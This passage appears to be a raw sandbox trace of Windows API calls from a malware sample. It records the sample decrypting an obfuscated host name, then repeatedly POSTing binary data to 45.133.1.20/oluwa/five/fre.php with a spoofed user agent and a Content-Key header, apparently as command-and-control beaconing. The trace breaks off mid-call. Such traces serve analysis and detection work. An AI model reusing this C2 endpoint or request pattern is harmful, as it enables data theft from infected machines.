[0263.075] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0263.076] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0263.076] GetProcessHeap () returned 0x6a0000 [0263.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0263.076] GetProcessHeap () returned 0x6a0000 [0263.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0263.077] send (s=0x90c, buf=0x6bd460*, len=242, flags=0) returned 242 [0263.078] send (s=0x90c, buf=0x6bb998*, len=159, flags=0) returned 159 [0263.078] GetProcessHeap () returned 0x6a0000 [0263.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9718 [0263.078] recv (in: s=0x90c, buf=0x6d9718, len=4048, flags=0 | out: buf=0x6d9718*) returned 204 [0263.184] GetProcessHeap () returned 0x6a0000 [0263.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0263.184] GetProcessHeap () returned 0x6a0000 [0263.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0263.185] GetProcessHeap () returned 0x6a0000 [0263.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba230 | out: hHeap=0x6a0000) returned 1 [0263.185] GetProcessHeap () returned 0x6a0000 [0263.185] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0263.186] closesocket (s=0x90c) returned 0 [0263.186] GetProcessHeap () returned 0x6a0000 [0263.186] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0263.186] GetProcessHeap () returned 0x6a0000 [0263.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0263.187] GetProcessHeap () returned 0x6a0000 [0263.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0263.187] GetProcessHeap () returned 0x6a0000 [0263.187] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0263.204] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1670) returned 0x90c [0263.207] Sleep (dwMilliseconds=0xea60) [0263.208] GetProcessHeap () returned 0x6a0000 [0263.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0263.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.210] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0263.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.223] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0263.235] GetProcessHeap () returned 0x6a0000 [0263.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0263.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.237] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0263.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.238] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.239] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.239] GetProcessHeap () returned 0x6a0000 [0263.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0263.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.241] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0263.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.252] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0263.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.254] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0263.254] GetProcessHeap () returned 0x6a0000 [0263.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0263.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.255] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0263.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.256] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0263.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.260] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0263.261] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.261] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0263.261] GetProcessHeap () returned 0x6a0000 [0263.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0263.261] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0263.262] GetProcessHeap () returned 0x6a0000 [0263.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0263.262] GetProcessHeap () returned 0x6a0000 [0263.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0263.263] GetProcessHeap () returned 0x6a0000 [0263.263] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0263.263] GetProcessHeap () returned 0x6a0000 [0263.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0263.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.273] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0263.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.281] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0263.289] GetProcessHeap () returned 0x6a0000 [0263.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0263.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.291] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0263.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.295] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.296] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.296] GetProcessHeap () returned 0x6a0000 [0263.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0263.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.298] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0263.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.299] CryptDestroyKey (hKey=0x6ad020) returned 1 [0263.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.301] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0263.301] GetProcessHeap () returned 0x6a0000 [0263.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0263.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.305] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0263.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.306] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0263.307] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.308] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0263.309] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.309] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0263.309] GetProcessHeap () returned 0x6a0000 [0263.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0263.309] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0263.309] GetProcessHeap () returned 0x6a0000 [0263.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0263.309] socket (af=2, type=1, protocol=6) returned 0x910 [0263.310] connect (s=0x910, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0263.333] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0263.333] GetProcessHeap () returned 0x6a0000 [0263.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0263.334] GetProcessHeap () returned 0x6a0000 [0263.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0263.334] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0263.337] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0263.337] GetProcessHeap () returned 0x6a0000 [0263.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9e70 [0263.337] GetProcessHeap () returned 0x6a0000 [0263.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0263.338] GetProcessHeap () returned 0x6a0000 [0263.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0263.338] GetProcessHeap () returned 0x6a0000 [0263.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0263.339] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0263.340] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0263.340] GetProcessHeap () returned 0x6a0000 [0263.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0263.340] GetProcessHeap () returned 0x6a0000 [0263.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0263.341] send (s=0x910, buf=0x6bd460*, len=242, flags=0) returned 242 [0263.341] send (s=0x910, buf=0x6bb998*, len=159, flags=0) returned 159 [0263.341] GetProcessHeap () returned 0x6a0000 [0263.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9718 [0263.342] recv (in: s=0x910, buf=0x6d9718, len=4048, flags=0 | out: buf=0x6d9718*) returned 204 [0263.416] GetProcessHeap () returned 0x6a0000 [0263.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0263.417] GetProcessHeap () returned 0x6a0000 [0263.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0263.418] GetProcessHeap () returned 0x6a0000 [0263.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9e70 | out: hHeap=0x6a0000) returned 1 [0263.418] GetProcessHeap () returned 0x6a0000 [0263.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0263.419] closesocket (s=0x910) returned 0 [0263.419] GetProcessHeap () returned 0x6a0000 [0263.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0263.419] GetProcessHeap () returned 0x6a0000 [0263.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0263.420] GetProcessHeap () returned 0x6a0000 [0263.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0263.420] GetProcessHeap () returned 0x6a0000 [0263.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0263.421] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x167c) returned 0x910 [0263.423] Sleep (dwMilliseconds=0xea60) [0263.424] GetProcessHeap () returned 0x6a0000 [0263.425] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0263.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.426] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0263.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.434] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0263.445] GetProcessHeap () returned 0x6a0000 [0263.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0263.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.446] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0263.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.450] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.451] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.451] GetProcessHeap () returned 0x6a0000 [0263.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0263.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.453] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0263.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.463] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0263.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.465] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0263.465] GetProcessHeap () returned 0x6a0000 [0263.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0263.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.466] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0263.470] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.470] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0263.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.485] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0263.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.487] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0263.487] GetProcessHeap () returned 0x6a0000 [0263.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0263.487] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0263.487] GetProcessHeap () returned 0x6a0000 [0263.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0263.488] GetProcessHeap () returned 0x6a0000 [0263.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0263.488] GetProcessHeap () returned 0x6a0000 [0263.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0263.489] GetProcessHeap () returned 0x6a0000 [0263.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0263.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.490] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0263.499] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.500] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0263.510] GetProcessHeap () returned 0x6a0000 [0263.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0263.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.511] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0263.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.513] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0263.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.514] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0263.514] GetProcessHeap () returned 0x6a0000 [0263.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0263.517] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.517] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0263.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.518] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0263.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0263.519] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0263.519] GetProcessHeap () returned 0x6a0000 [0263.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0263.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.521] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0263.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.522] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0263.522] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.523] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0263.523] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0263.524] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0263.524] GetProcessHeap () returned 0x6a0000 [0263.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0263.524] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0263.524] GetProcessHeap () returned 0x6a0000 [0263.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0263.524] socket (af=2, type=1, protocol=6) returned 0x914 [0263.524] connect (s=0x914, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0263.551] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0263.551] GetProcessHeap () returned 0x6a0000 [0263.551] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0263.551] GetProcessHeap () returned 0x6a0000 [0263.552] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0263.553] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0263.554] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0263.554] GetProcessHeap () returned 0x6a0000 [0263.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba5f0 [0263.554] GetProcessHeap () returned 0x6a0000 [0263.554] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0263.554] GetProcessHeap () returned 0x6a0000 [0263.554] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0263.554] GetProcessHeap () returned 0x6a0000 [0263.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0263.555] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0263.556] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0263.556] GetProcessHeap () returned 0x6a0000 [0263.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0263.557] GetProcessHeap () returned 0x6a0000 [0263.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0263.557] send (s=0x914, buf=0x6bd460*, len=242, flags=0) returned 242 [0263.558] send (s=0x914, 